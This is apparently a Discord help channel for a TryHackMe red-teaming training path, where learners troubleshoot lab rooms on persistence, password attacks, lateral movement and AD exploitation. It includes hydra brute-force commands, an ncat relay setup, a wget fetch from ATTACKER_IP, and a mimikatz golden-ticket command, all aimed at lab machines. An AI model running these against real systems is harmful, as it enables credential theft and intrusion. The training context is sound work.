#red-teaming-path
I just swapped the ports on the question as indicated on the ncat -lvnp 443 -c "ncat TARGET_SERVER 25" line
sent it over to the form and navigated to the site on the port that is not allowed to send traffic to our network and... well, it times out
Hello mate, I’m trying to get done with lateral movement, but while I set my DNS and restart systemd, the nslookup won’t resolve to the IP I set, and neither are the creds accessible. Anything I’m supposed to be doing that I’m missing?
I’m using the inbuilt ATTACKbox too
The thmuser3 on Windows Local Persistence Task 2 is refusing to log in
I made the necessary changes to the RID for hijacking as instructed
I tried both evil-winrm (using both password and hash) and remmina from the AttackBox but no dice on any
Hello, I have a problem by opening shell.aspx in Persisting Through Existing Services
Finally I completed My Red Team Certification @low igloo
you should give permission to the shell.aspx file to run on the IIS web server
https://static-labs.tryhackme.cloud/sites/opsec-task-7/
wondering why this iframe is so bad, simply a bad UI/UX.
couldn't figure out what to do in the first 5 minutes
Hey guys, I'm stuck at red team password attacks task 8, question 1. I used every possible password to log in to ftp but none of them contain the flag. Can anyone help me?
Are you using a wordlist?
yes
It says you don't need to brute force. How else can you get in ftp without brute forcing?
I just went back and tried again and I was able to get in with anonymous
yes but there is no flag
Yes, it's in the directory listed in there
Not stupid at all. Sometimes we tend to overthink things
Thanks man 🙂
You're welcome
Enumeration room task 5 question 1: the dig command doesn't work with -t AXFR, any help?
What do you mean it doesn't work? What happens?
Did anyone have any issues with this?
transfer failed
; <<>> DiG 9.18.0-2-Debian <<>> -t AXFR redteam.thm@10.10.41.68
;; global options: +cmd
; Transfer failed.
a lot of people. Check that you replace the hex number, not add. There has to be a 00 at the number 3 at offset 30, not 03 or something else. Restart the machine, use xfreerdp or remmina, winrm won't work. Try both
Try it with a space between the name and @
that, redteam.thm isn't a username, it's the domain and @twilit prairie.10... is the dns server
Well, yes. Thats what I mean though
@manic umbra I tried both winrm and remmina on the AttackBox but next time I go for it I will make sure to replace the hex, and not add. I'll let you know how that goes
Winrm didn't work for anyone as I recall. I first had problems too, but yesterday after redoing it with a guy from here, it was an instant win. Reboot might really help
Can someone confirm how large the password list should be for https://tryhackme.com/room/passwordattacks - Task #8 -- Challenge 4?
I think i'm doing it correctly but my password list is prohibitively large
ETA is like 2 hours
537026
if shadow checked the right list
thanks, that's how large mine is as well.
for more help if you need it shadow would like to see your hydra command.... of course you can skip that and try on your own
hydra -t 64 -T 128 -l burgess -P pass.lst 10.10.56.25 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
the -T gets downgraded to 64
no problem
Hello mate, please I need help with lateral movement task 7, Tunneling complex exploits. The "putting the whole command together" part is confusing and I’m having a hard time getting over it. Am I supposed to ssh using the username I log in with by replacing tunneluser@attacker_Ip? If not, I keep getting prompted to input a password after the initial command. What am I doing wrong? Need some help, thanks
Thanks again! I got it!
Gave +1 Rep to @royal void
probably more in #lateral-movement-and-pivoting channel if you need help with that network
FHA na
Thanks ***
Please if anyone could help here too I would appreciate it, as the room suggested by @royal void seems to be a lil dry
@royal void I guess I spoke too soon. I was getting a false positive. Here's my new command that I'm trying and it still has a very long ETA
hydra -t 64 -T 64 -l burgess -P pass.lst 10.10.56.25 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:Incorrect username or"
Does this look correct?
almost..... filter on success and logout.php the same way you did for GET also include the -f at the end
Is there a good reason to fail on success instead of failure?
It did work. I'm just curious why my method doesn't work.
sometimes hydra needs to check the page in certain ways to work out
thanks
Gave +1 Rep to @royal void
+rep @velvet root he helped me on DM
Gave +1 Rep to @velvet root
Does anyone know a good place to ask about what appears to be a problem in the "Breaching Active Directory" room? I can't seem to connect to what appears to be the DC host as (well, anything, but also) a DNS server.
Thank you!
Gave +1 Rep to @native berry
Can anyone help me with c2
sure if you explain what your problem with it is
Communication over dns protocol of the flag.tunnel.com
It's that I'm unable to connect to flag.thm.com
Even tried ssh
Got it… solved
what does that have to do with the C2 room???
Dns dude
I'm working on https://tryhackme.com/room/enumerationpe -- Task 5, Q3 -- It seems that snmpcheck is taking a long time to enumerate.. is this expected?
Command I'm using:
snmpcheck-1.9.rb 10.10.115.159 -c public
and output so far:
snmpcheck.rb v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.115.159:161 using SNMPv1 and community 'public'
I figured it out -- I'm not sure why, but I had to start snmp manually using
net start snmp
Anyone around that can help me figure out why evil-winrm is taking forever to finish this command?
reg save hklm\system system.bak
This is for room: https://tryhackme.com/room/windowslocalpersistence -- Task 2
I had this problem as well. I ended up just hosting an ftp server on my kali machine and uploaded it via ftp from the windows machine.
Hi, can anyone help me out with the network configuration of Breaching Active Directory? I have updated /etc/systemd/resolved.conf but after running nslookup thmdc.za.tryhackme.com I'm getting this output
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
...
pip install netifaces
I also tried with simple pip
hi!
I am wondering about this red teamer title. Is it obtainable after 21 September? Also, can you choose which title you want to use or are you just red teamer after that?
got answer thx
Am I missing something here? Lateral Movement and Pivoting room - Task 3: Spawning processes remotely
Apparently you HAVE to use the payload specified in the instructions and you HAVE to use exploit(multi/handler) to catch the shell. Then you can execute and get the flag
hey guys
I'm getting error in power shell: Invalid namespace
command is: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
room: the lay of the land -- Host Security solution1
Solved
It's not an error, read the information properly and you will get it ✌️
@echo ore could you please add me as a friend here on discord? I'd like to have a chat about the great lateral movement room 🙂
Anyone having any issues with flag13 in Windows Local Persistence? Followed the steps but it still wants to only get flag12 and isn't allowing flag 13 to be grabbed
Have you read through the Custom Rules section of the page?
Yes
The hint is so close to the answer.
The hint won't give the answer but it is very close
This is useful - ^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.
Finished the path today and got exactly 400 rooms finished. Still enjoying the learning journey. Thanks for the nice content! 😉👍
somebody doing obfuscation? trying to understand code from task 7. if the remainder of 3 is equal to 1, how does the code enter the switch statement?
Any one up ?
Not sure what's going on here...
This is the Intro to C2 where we set up the apache2 proxy.
Probably you are not using a payload that supports that ?
these ad rooms are top quality @white prairie i think i finally get golden and silver tickets now 😄
i think you need to choose a payload.
even for a listener?
Yes
Anyone win any cool prizes with their tickets yet?
We won't know until Thursday/Friday.
yes shadow got a nice hat
However, I think I got the Pineapple.
guys, i'm stuck with task 4 in sandbox evasion room, none of options is ok, anyone can help me?
I didn't get 3 of anything other than the Red Team and the streak freezes unfortunately
somebody doing obfuscation? trying to understand code from task 7. if the remainder of 3 is equal to 1, how does the code enter the switch statement?
oh is this how to solve it ... xd
I ran the code and got the flag
yay I know... I just wanna understand the if to enter in the switch case
this?
if(x==1) before the loop?
yes
then enter in the equation
then x = 10
yes
so how does it enter the next if, if x !== 1?
then this condition is false it won't trigger
if(x==1) won't trigger first time
that's the idea of using the collatz problem
the x=10 will keep going in the loop because the condition of the while while (x>1) is true
at the end x will reach 1 and the condition of if(x==1) will become true
what end?
first time it is 10, then from there it will increase the number
don't understand how the remainder becomes 1
I can't send pics but check this code
```python
# Collatz sequence: loop until x reaches 1
x = 10
while x > 1:
    print("X: ", int(x))
    if x % 2 == 1:
        x = x * 3 + 1   # odd: 3x + 1
    else:
        x /= 2          # even: halve
```
after 5 loops the remainder will become 1...
ah.. got it
register your token to send pictures
and send it to the bot
I verified in old account...
so I am waiting to see one of the mods active to ask him to fix that
can someone explain to me why i should do data exfiltration when i can simply copy and paste data through ssh?
Send me a DM about it when you around
I mean, that is data exfiltration. 🙂
what if firewall blocks that?
how far into the red team path are you guys? I'm still in the fundamental modules :c
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
Can't get meterpreter
and I had no idea Windows had an ARM version
Certutil doesn't seem to work. I'm just trying to upload man...
so u already got the shell running on the machine in metasploit?
have u tried powershell -c 'wget ...'
powershell doesn't want to respond.
can't even run the damn thing
ok, nothing is running...
big surprise
i have shell in Armitage, yes
it doesn't have powershell or sth?
Not sure, but it hasn't worked. Had to restart Armitage 4 times after shell/target stops responding. Powershell never runs.
and the ARM error has me confused
In Task 5 of Windows Local Persistence (Abusing Scheduled Tasks) I get the reverse shell but it refuses to execute flag9.exe as if I were missing something... and I just recreated it with a different service trying to run as SYSTEM but still no flag 9... any ideas? got it
I'm just going to run on msfconsole, see if that works. So far, Armitage is very disappointing.
yup... works. Go figure.
there's gotta be a better free option. Or perhaps it's something on my end. I don't really know.
change the name of the scheduled task
you don't need meterpreter
Then how do you upload?
wget , powershell , smbserver ,etc...
already mentioned those. Didn't work.
It's fine. It was Armitage. It's broken, at least for me.
They all work just fine through regular Msf. Not with Armitage was my point.
what is wrong with armitage?
it doesn't run the exploit?
No, it runs the exploits but the shell seems to be really unstable, for some reason. Not sure if it's my system or the program.
I've required a restart about 5 times. What should have taken 10 minutes took me 3 hours...
Major pain in my ass... lots of hoing and humming...
and deep-breathing techniques
try updating it
because the reverse shell wasn't crashing with me
unless you tried to upgrade to meterpreter
I installed via apt but either way, i would like to try other C2's
So, if it's not up-to-date then I must be crazy, heh
I haven't liked it from the beginning. That module took me 2 days to complete
Eventually, just used msfconsole and it went perfectly
yeh
I need hint for room Signature Evasion task 2 To the nearest kibibyte, what is the first detected byte?
I don't know what does it exactly mean
exactly same question
What is the base address for the ETW security check before it is patched?
These two questions are the worst in the TryHackMe task
hi there, please anyone could let me know how to make Teamserver (Armitage) work? :S I've tried couple things but nothing really works...
I also gave up on Armitage on that room. I think maybe Armitage + msf6 have an issue. Which isn't too surprising as I think Armitage is going to be stagnant from now on.
I didn't try it, but someone industrious could try using something like kali 2020.
Or downgrade msf6.
yeah what a shame :(, just completing the room with armitage from apt and msfconsole.
I think I am lucky for not having such issues with armitage
Can I ask if I want to have red teamer title in Tryhackme, do I need to finish the path before 22nd?
No, you have to finish rooms, receive tickets and with some luck you get 3 tickets for this title. Lucky for you, they are unlimited 🙂
BUT: "The ticket promotion ends on the 21st of September 2022, 11:59 PM BST!"
so you'll have to hurry up 😅
😂
In task 8 question 3 I am unable to get a successful login.
I am using the cewl wordlist with a min length of 3 and depth of 10. I've tried a few different rules but the hint seems to say to use the clinic.lst which was the name of the cewl file.
anyone have advice? I'm starting to think it's the username phillips that is incorrect.
Oh, this is for the password attacks module btw.
it is not a module it is a room but okay lets start here
Thank you for the correction @royal void
Gave +1 Rep to @royal void
if you run wc -l clinic.lst what do you get as output???
366
well then that is where your problem lies
10 might be too short, unless the instructions crafted your cewl command with that.
check the command in the task 7 for the command
i.e. your list is too large
it should be about 3 times smaller
ok, now it is 105
then now try using hydra for the phillips account
|| hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed"||
I ran that, no successful login
dunno if that would work but here you go for another hint ||see if you can use the :S=something to make hydra know it is a success instead of a failure||
Yes, 16 passwords found in that case.
changing back to F I get nothing. So either the username is wrong, or the password list is incomplete?
try with the -f flag for hydra too
which is placed at the end of the command
||hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed" -f
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-20 15:10:14
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task
[DATA] attacking http-get-form://10.10.188.101:80/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-20 15:10:21||
lol sorry for the messy output...0 passwords found.
you did not try with :S=something as you should have
wonders if nobodynate got it now
@primal kernel got it???
Sorry, had to afk for a min. I did run with S and the first job on each thread returned success. I got 16 successful passwords with S
bonk
fine, let's just give you the correct command so you can compare
||hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f||
you will need to change the ip but other than that it should work
woah, that's odd
It worked... but I'm extremely confused why
How would someone know a success will redirect to logout.php without already logging in successfully?
the -f states to only use the first correct results and disregard any others
you know it runs php.... you also know that there tends to be logout options on logged in web pages
well thank you for your help @royal void . I still think this is quite a jump for someone to make but I appreciate you helped me get through it.
Gave +1 Rep to @royal void
oh, I've never heard of hydra being finicky. I'll have to read into it more.
I need some help in the Password Attacks room with the Hydra tool. When I try the SMTP I get "SMTP LOGIN AUTH, either this auth is disabled or server is not using Auth".
have i missed some arguments in hydra ?
what is your command??? most likely you forgot that you need the full email address for it to work
hydra -l pittman@clinic.thmredteam.com -P wordlistclinic.txt smtp://10.10.10.50 -v
and i have tried with smtp://10.10.10.50:25
hydra -l pittman@clinic.thmredteam.com -P custom.lst smtp://10.10.48.200 should work if you replace the ip address
where is custom.lst ?
that is the name of the wordlist you made with the john command
don't I need to replace that with my wordlist file I have created?
yeah you would need to replace that too
oversight by shadow there
if it still does not work could you do wc -l nameofyourwordlist and tell shadow the number???
2800
that is way too short
then i need to backtrack my steps, but i still get the error on the SMTP Login Auth
should it not just say it failed ?
¯\_(ツ)_/¯
or is it because I don't run as root?
no you should not need root for this as it should work fine without
is 5600 a better result for the wc -l ?
better yes.... enough for it to be as long as it is supposed to be??? no
shadow's list is 21000 lines
am I doing the john part wrong
English is not my main language and I have dyslexia so I am used to making some mistakes because I don't understand everything completely
well it does i think, let me check
and then to generate the list you do john --rule=thm-rule-name-here --wordlist=clinic.lst --stdout | tee name-of-new-wordlist.lst
my rule is Az"[0-9][0-9]" ^[!@$#]
huh why did it make a smaller list then....
cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ is the command you should have used for the clinic.lst
as it states for you to do in task 7
that resulted in the first list that only had 2600
wonder if my firewall blocks the page
the clinic.lst is 105 lines long
i really think my fw blocks the page 😄
maybe
Mmm.. I have a VBScript that runs calculator but it doesn't want to with cmd.exe. Is AMSI or something preventing this?
think something prevents it from opening it graphically
because some cmd instances showed up in taskmanager when shadow tried
Well, that's not helpful...
not you, the script.
The script isn't helpful...
yup... they're all there on task manager
just floating around
It wouldn't give me NT AUTHORITY anyways, would it?
Wscript probably runs as the user
not sure
It's my Parrot install that is messed up. If I run it in the AttackBox it works and I get more results. If I run cewl in my Kali VM I get more. It's a local issue, but thank you very much for your help. My brain needs this exercise, or however it's spelled 😄 Thank you!
Gave +1 Rep to @royal void
no problem.... glad you could figure it out
maybe it is some cewl version error or something else is the cause
Maybe, Parrot runs 5.4.8 and attackbox 5.3
It could maybe be a version issue with hydra as well, as I get these strange errors. But I will check that tomorrow after work 😄
Anyone else facing problem in attack box in data exfiltration task 8 , unable to netplan apply
Try it with kali machine instead
Tried but I feel my configuration is not set . Not getting the correct ip for flag.thm.com
Anyone completed Task 10 (Real World Scenario) of Evading Logging and Monitoring?
I can't get it thru' after more than 5x tries....
Already checked but still got caught...
Please share. Thanks
Only one more section left: Host Evasions!
K... this is a n00b type question but here it goes: In the 'Signature Evasion' room Task 2 'Signature Identification' it says we should use the native tools head, dd, and/or split. These are native to Linux, and the files (e.g. shell.exe) are on the Windows machine. How did you transfer the files from the Windows machine to the AttackBox?... please be nice LOL
if port 22 is open u can try scp
I tried scp but it refused to connect via 22
I will try it again later. Thanks @main oyster for the suggestion!
Gave +1 Rep to @main oyster
scp uses port 22 to transfer that's why i asked if the port is open
I don't think it was when I did the nmap scan... I had tried to connect via smbclient but the user has no workspaces available, this why I asked here... kind of out of ideas on this one
From AttackBox,
$ python3 -m http.server
Then on Powershell,
wget http://ATTACKER_IP:8000/filename.xxx -O filename.xxx
That would work well if the files were on the AttackBox to get them from the Windows machine... but this is backwards...
or maybe I'm getting the room wrong. The files are in the Windows machine (i.e. shell.exe) and the tools it talks about being native are native to Linux... i.e. split, head, and dd
Signature Evasion Task 2 - Signature Identification
thanks anyways @ripe basin for taking the time to answer
Gave +1 Rep to @ripe basin
no issue at all 😎
Heyy
What is the base address for the ETW security check before it is patched ? Evading logging and monitoring room
I've logged into attackbox through the browser, setup armitage, scanned for hosts but there aren't any Windows hosts, just 8x Linux machines (including the attackbox). Any ideas on what I'm doing wrong?
Are you scanning a network range, rather than the specific target machine IP ?
What up peeps
decided to make it a point to have discord open when studying
Gets me in the community i guess
if that makes sense
probably should hang out in #general then
you're right, just seen this path and I'm studying it lol
I've tried scanning the /24 network as well but no idea what the victim_ip is supposed to be. In the screenshots they are scanning 10.10.176.100/32 but the attackbox that booted up for me was on 10.10.10.0, so scanning 10.10.176.100/32 didn't produce anything.
on Evading Logging and Monitoring: Task 10. I'm running the gpp-bypass.ps1 script, clear event logs, run the agent.exe file and I still get the "Traffic halted, you got caught" message. When checking the registry I do see the values are 0, meaning logging is disabled, so how come when running the script I can still see logs in Microsoft/Windows/PowerShell/Operational?
I also disabled the Scriptblock logging via gpedit.msc and I can still see logs when running agent.exe 🙂
Now it's fixed 😄 I needed to update ruby and after this both the cewl and hydra commands worked fine. Thanks again for your help and for getting me to redo my steps and eventually find my issue. The hydra command found the password in 1 sec 😛
Gave +1 Rep to @royal void
You have to start the target machine that's attached to one of the tasks by pressing the green "Start machine" button (not to confuse with the blue "Start attackbox" button)
That should then give you a box like that, where you can find the target machine IP:
I had similar issue too...
were you able to figure out what caused it?
Thanks, much appreciated!
Gave +1 Rep to @native berry
Nope... I redo and recheck... still not successful. 😠
And it is the last task in Red Teaming path...
yeah, strings etc.....was next on my list 🙂
Anybody have problems with Network Security Solutions task 4 and task 5? In task 5 it says I should be able to access port 8080 on the box spawned in task 4 but it is inaccessible and reported as closed with nmap
never mind just took a while for the service to start.
nice..... now continue your learning journey
The network in Breaching Active Directory seems fubard atm, cannot ping or resolve thmdc.
its started and its pointing to the thmdc ip 10.200.55.101
okay, it was started, I just stepped away for 30 mins
now i just started it again
but still no resolve.
had to double restart systemd >< any hoo, here we go again i will be back if further issues come up
Wow... thanks @weak ice 👍
Gave +1 Rep to @weak ice
Hello, in Windows Local Persistence Task 2. I added the thmuser1 to the Backup Operators and Remote Management Users groups, but I still can not connect via rdp. Is there other password for this user instead of Password321?
me too, same issue! did u understand why? [RESOLVED]
Abdy, I believe that you should add the user to the Remote Desktop Users group also. That's a Windows requirement...
https://tryhackme.com/room/winadbasics im on Task 3
What would be the name of the machine account associated with a machine named TOM-PC? im looking over the active directory and existing machines use PC-<name> LPT-<name> SRV-<name> or SVR-<name> but none of that works with TOM? its supposed to be 7 letters
lol solution was trivial simply $ at the end
heads up seems like some of the rooms will have access expire in 2-3 days in the ad section
I added the user to the both groups that is said in the requirements. Is there a third one? I added to Remote Management Users, not Remote Desktop Users
Show a screenshot pls
Anytime i submit a flag for the OPSEC room , i get a confirmation it's the correct answer but the task doesn't get marked as completed even when all the questions are answered.
eg: Task 2 is answered but doesn't show as completed.
I'm having issues starting the Windows box for Protecting and Stripping Identifiable Information. The box is grayed out. I terminated both machines because I was finding problems, but when I restarted the machine the Windows machine won't start but the Ubuntu attackbox restarted. Is there a reset option?
I'm just gonna install the compilation toolchains locally and then when the Windows box can start again i'll upload it.
Never mind. Solved. Outside of CreateRemoteThread function you can just take the other indicators and use echo -n maliciousHandle | rev to auto-generate new handles and it’ll work. I didn’t realize I just had to navigate to the IP to submit the exe file
The correct progid is txtfile, not textfile. You have an extra E
Hey is anyone else having issues in the Password Attacks room and unable to access https://clinic.thmredteam.com/
How to check who is winner of red teaming path
Prizes?
Room:Firewalls Task:7 does anyone gets the ncat tunneling to work?
well, i assume the port forwarding is done on the same server so the listening port of 8008 is the same as the forwarded port (for any other port I'm getting connection time out (that tells me the FW blocks the connection) but i can't get that to work
I used nc on a different port. 🙂
well I tried other ports as well, 8081 for example, can't get it to work
Are you doing it just now?
yes
VM or Attackbox?
attackbox
In fact I'll test it in attackbox, it shouldn't be different,
the connection just times out
which makes sense if there is a FW blocking all other ports
So you see
Ncat: connection from IP:Port ?
im using ncat -lvnp [port] -c "ncat localhost 8008" on the web form
Yes
Did you E-mail for any?
I did it a different way.
email?
so that is the correct way?
No
hello+tickets3@tryhackme.com
You're both mixing yourselves up, which isn't helping lol
@zealous wind
nc -lvnp 21 in a terminal window first
ncat attackboxip 21 -c "AttackboxIP 80" Firefox window
If you E-mailed during the event for the big prizes, you'll be E-mailed back within 2 weeks.
Ok
@zealous wind have you done the steps?
i dont get it, if i create an NC listener on port 21 on the attack box and then run a ncat command from the remote server, shouldn't it be on port 21 as well?
Yup, I missed that part out lol
so i should be expecting a shell from the remote server?
cause im not getting one 🙂
Can you share a screenshot?
attackbox
You have one DO these steps.
I cannot receive the 9th flag... however I ran the schtask reverse shell and deleted the reg value
web form
GET / HTTP/1.1 hit enter
host: default enter
On the terminal that is listening
im not getting any connection back
Hit enter twice more
nothing
Screenshot?
this is the command i put in the webform on the remote server ncat 10.10.110.204 -c "10.10.110.204 21"
fixed it, still nothing
Did you not get a connection on the nc?
Can you DM me?
I am facing a problem in the password attack room in task7
I am supposed to create a word list from. The website
But this website isn't available!
same for me maybe THM staff can restart the service https://clinic.thmredteam.com/ plz
Hi guys, I cannot connect to the lateral movement network. I used the attackbox, a Kali VM and my own machine and none of them connected to the network
ROOM: Lateral Movement and Pivoting
How to change permissions in iis apppool Windows Local Persistence room flags.exe
I was not understanding please help me
I don't recall needing to change permissions in the iis apppool?
You need to run something in the web server with its permissions.
is there anyone using hashcat on windows to help me with the installation?
You should review this command, that doesn't look right.
Did you download the correct vpn pack && change your dns?
yes
Can you cat
/etc/resolv.conf
10.200.19.101 needs to be above your nameserver.
Either that or you can delete 192.168.0.1 all together, just need to remember and change it back
I'm on the exploiting ad room working on task 8 and I ran the necessary commands but keep getting told that \thmrootdc.za.tryhackme.loc\c$\ doesn't exist. One thing that I'm not sure of atm is when you run kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt I noticed that the previous command lsadump::dcsync /user:za\krbtgt doesn't give me an rc4 hash? Not sure which hash I'm to use
probably more help to be gotten in #exploiting-ad channel
rgr that leave it for me to assume this be right just because its on this path 🙂
Seems I'm doing something wrong in https://tryhackme.com/room/signatureevasion Task 2, manual signature identification.
When I upload the shell.exe, I get an alert. If I split the file in half with split --bytes 36901 shell.exe and upload both halves, I don't get any alert. I suppose the signature was right there at the half and I split it 😄 Am I using the tool wrong? Any other tool I should use?
oh, forgot, yes, I moved the files in a folder that are not excluded from defender, it detects shell.exe after all (c:\uploads)
I'm stuck on Task 4 in the Passwordattacks room
I thought I was putting in the right crunch command and it even works in the terminal, but the question is saying I'm wrong:
"crunch 5 5 -t THM@! -o tryhackme.txt"
What am I missing?
https://web.archive.org/web/20211228080331/https://clinic.thmredteam.com/
@white thunder
I used the web archive in order to create wordlist
Go for this URL, working fine for me
The official website of Elite Medical
Thanks @gilded edge
Gave +1 Rep to @gilded edge
I don't get where we're seeing that Domain Users has the AddMembers ACE?
Room: https://tryhackme.com/room/exploitingad
Task 2
Just Generic Write
Hi, i'm doing the Enumeration room,
I never found any port higher than this number highlighted and it is not accepting it
is there anything wrong ?
I used the command "sudo netstat -tlp"
oh i found the correct command to be "sudo netstat -tlpn" to show the numeric port number instead of port name
I am currently in the Password Attacks room and I am trying to run the "cewl" command on https://clinic.thmredteam.com/ and I keep getting "Unable to connect..." errors - is the site down? I am connected using my own Kali VM over OpenVPN.
Thank you, I didn't see that - should probably research a little further before asking next time...
Hey everyone, the domain issue is being investigated. Thank you for your patience
any suggestions?
Guys anyone knows,
Where i can download free active -directory pen testing videos
That was it. Thanks for the tip!
This issue has been resolved. Please allow 24 hours for the DNS records to repopulate
imo you could start after the first three listed ones. And always have an eye on the recommended knowledge mentioned in the beginning of each room, sometimes there are suggestions and references to other rooms
Hello, I get this error in Data Exfiltration room Task 6. Can somebody take a look?
thanks :)
hey, I'm working on Persistence task 6, flag 13. I set the environment variable as described in the task, pointing to my shell, but I can't receive a connection back. Has somebody else faced this issue and knows a fix?
Might want to share a screenshot of your registry editor
Ah sure
And did you sign out and back in?
Or did you just disconnect the RDP and connect again?
Yes, I did...
Did the previous section for winlogon work fine, so you are using the same attacking machine as for that previous section?
I guess you could either double check all the settings for your msfvenom payload, especially to use the exe format and not exe-service
Or might want to try to restart the target machine and start all over
No, I'm using a different one, because I already tried restarting it a few times
previous tasks worked fine
msfvenom command is correct
So what are you using as your attacking machine, the AttackBox or your own machine?
my own machine, I'll give it a try with the AttackBox
OK, might want to check `ip a s` to see if you have just a tun0 interface or any extra like tun1, tun2, etc.
If that's also not the case and it's not working with the AttackBox either, I can only think of some sort of issue with the payload you generated
doesn't work with the AttackBox either; the payload works fine... I tried it out by just executing the exe on the machine and got a shell, both on the AttackBox and on my own
I mean, if you receive the shell by just executing it, then are you sure your exe is in the right path, as you specified it in the registry?
I recently did that room too and that task was working just fine
I double checked everything
You got the target machine open right now? If so, if you let me have its IP, I could RDP into it myself
I have, should I DM it to you?
Yes
Hello, in Windows Local Persistence Task 2 Special Privileges, when I open the Windows permissions from PowerShell, I cannot see my thmuser2 there
Just add it
Oh yeah, sorry... I didn't see it
I still have a problem. First, when you work with secedit and export the config file, do I have to edit the one from the Administrator home directory?
Shouldn't matter as long as you can open and edit it
OK, I still have some problems, but I think it's because I restarted the machine. I will try again in a few hours, thanks!
Hi, I don't know if I'm doing something wrong, but in the third part of the second task of Windows Persistence I have to open the Windows Registry according to a path
Which is HKEY_LOCAL_MACHINE > SAM > SAM > Domains ...
But in the Registry Editor of the room's prepared machine the Domains directory doesn't appear
Any suggestion?
Ahh sorry
I forgot to run it with PsExec64, heheh
It's working now, thanks!
Has THM stopped giving tickets for the Red Team path?🙂🔥
Yes
I've recreated this, terminated the entire network and started over, and I always end up back here. So, what am I doing wrong?
I was also struggling hard with this task. I also had to begin from scratch once. But if you follow the short videos step by step it will work, trust me. Keep in mind to execute the commands on the correct machines; I guess in my first try I messed up some of the steps.
Hi! I can't retrieve flag9 from the 5th task of the Persistence room. I have repeated the whole process twice and I still don't get it.
I was inclined to think that it could be my fault but the process seems pretty simple to be my mistake two times, so I think that something is wrong
Can someone help me with the flag?
did you remove the thingy in the registry and then query for it on the main account???
You mean the SD file?
Yes, opening the Registry Editor as SYSTEM with PsExec64
and then I query it and it gives me an error
hmmm
shadow has the flag but just sharing it outright is kinda not allowed
I understand 😦
I still think it might be something you missed or did wrong, but dunno what
I think I will continue with the path and come back to it later
yeah that is a good idea
yes, thanks anyway!
Sorry for the kind of cryptic errors there. Your issue seems to be you haven't removed the SD registry entry. If you just deleted its contents, the flag validator might complain.
Has the Red Team event ended?🙂🔥
yes
Hi! Thanks for answering, but I already deleted it two times. Furthermore, after deleting it I try to query my service and it can't be located, so I guess I deleted the SD file correctly. Thus, I don't know what else I'm doing wrong.
What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?
To make sure every character in there is used as such.
E.g., if you have a word like Hello\World, it's not using the backslash in the wordlist without quotes
I guess the special characters used by crunch itself are exempt from that.
tes
Hi, I wanted to ask a question about evil-winrm
Am I correct in saying that it's SSH but on steroids? It's limited to the Windows WinRM service only. But how is it able to do tasks like AMSI bypass so easily?
Also, PowerShell modules are pretty easy to load for in-memory execution...
well, evil-winrm is not just a WinRM client, it has a lot of built-in stuff I guess
The stuff in the image does NOT trigger a reverse shell, but doing the exact same thing in cmd.exe works. Anybody know why?
try to specify the full cmd path
same result. Again, in cmd.exe the exact same commands work. I wonder if it has to do with some subtle difference in echo
they definitely do something different
no I don't think so
`echo '1'>test.txt`
Still different hashes
it has nothing to do with this difference in echo
but maybe the difference is because of the end-of-line character "\r\n" / "\n"
yeah thats what I mean, maybe PowerShell does a different newline that breaks the .bat script?
this should not happen
you mean the bat script breaking?
yes
if you want to make sure about that
use the .bat file created using cmd
Is there an issue with the Data Exfiltration room task 7 ICMP? Every time I run a command in the terminal it locks up and doesn't let me do anything for 2-5 minutes.
I've restarted numerous times and killed all other connections. I'd really like to complete this without using the AttackBox.
Is that in the AD portion? If so I'm having technical difficulties as well within the domain
No it's in Data Exfiltration
Hello guys, is anyone else experiencing this issue while trying to RDP into any machine on the red teaming path?
Room: The Lay of the land
Thanks! But the problem is already resolved!
xfreerdp gives me issues a lot of the times. I usually just use Remmina
Hello, I can see that a lot of commands are done with PsExec in the Windows Local Persistence room. How can you do these in a real-life scenario?
Also, flag13.exe is not working. I got the reverse shell but I get flag12 instead of flag13
For the last flag I got this error, do you have any idea?
I didn't clearly get the first message. Do you mean that some commands are specific to PsExec only? So how can you do the same exact work without PsExec?
The same problem happened to me. If you used the same payload exe for getting flag13, the flag12 payload will connect before the payload for flag13, so try to change the port number or remove the payload exe entry in Userinit so that only the payload for flag13 connects back to you!
This is a non-interactive shell. It is clearly saying you have connected to the victim; just type the command. You will get the command output.
According to windows local persistence room
There is only one major use of PsExec: to simply get SYSTEM account access to edit registries!
There are also alternative ways to do this task. Sometimes in the real world you can get a reverse shell as the SYSTEM account after exploiting some type of vulnerability, or you can also migrate to a SYSTEM account process. After that simply use the reg command to do the same task in the terminal rather than in the GUI
Ah, I understand. And is PsExec a forbidden software by antivirus?
Oh, I changed the payload, but I think I used the same location as the previous example. You should be right! I had this in mind, but did not modify it correctly.
I think I tried inputting commands and it did not work.
I will try again later and I will let you know. Thanks for the help!
Nope, it's not a malicious program.
it's a Windows utility
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
But it is not installed by default on Windows, right?
yes
it is not provided by default
Check out the Sysinternals tools
You can tag me anytime, if you have any question!
